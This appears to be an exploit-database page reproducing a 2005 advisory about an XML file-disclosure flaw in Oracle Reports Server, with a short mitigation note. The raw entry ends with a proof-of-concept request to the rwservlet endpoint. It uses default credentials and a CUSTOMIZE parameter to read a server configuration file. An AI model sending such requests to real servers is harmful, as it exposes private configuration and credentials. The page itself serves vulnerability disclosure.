header-logo
Suggest Exploit
vendor:
Oracle Reports Server
by:
SecurityFocus
7.5
CVSS
HIGH
XML Disclosure
200
CWE
Product Name: Oracle Reports Server
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Oracle Reports Server XML Disclosure Vulnerability

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary XML files. Reportedly, the server fails to restrict users from accessing parts of arbitrary XML files when handling specially crafted HTTP GET requests.

Mitigation:

Restrict access to the Oracle Reports Server and ensure that only trusted users are allowed to access the server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14311/info

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary XML files.

Reportedly, the server fails to restrict users from accessing parts of arbitrary XML files when handling specially crafted HTTP GET requests.

All versions of Oracle Reports Server are reported to be vulnerable to this issue. 

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/pro
duct/9.0.2/webcache/webcache.xml

Navigation

Suggest Exploit

Services By CQR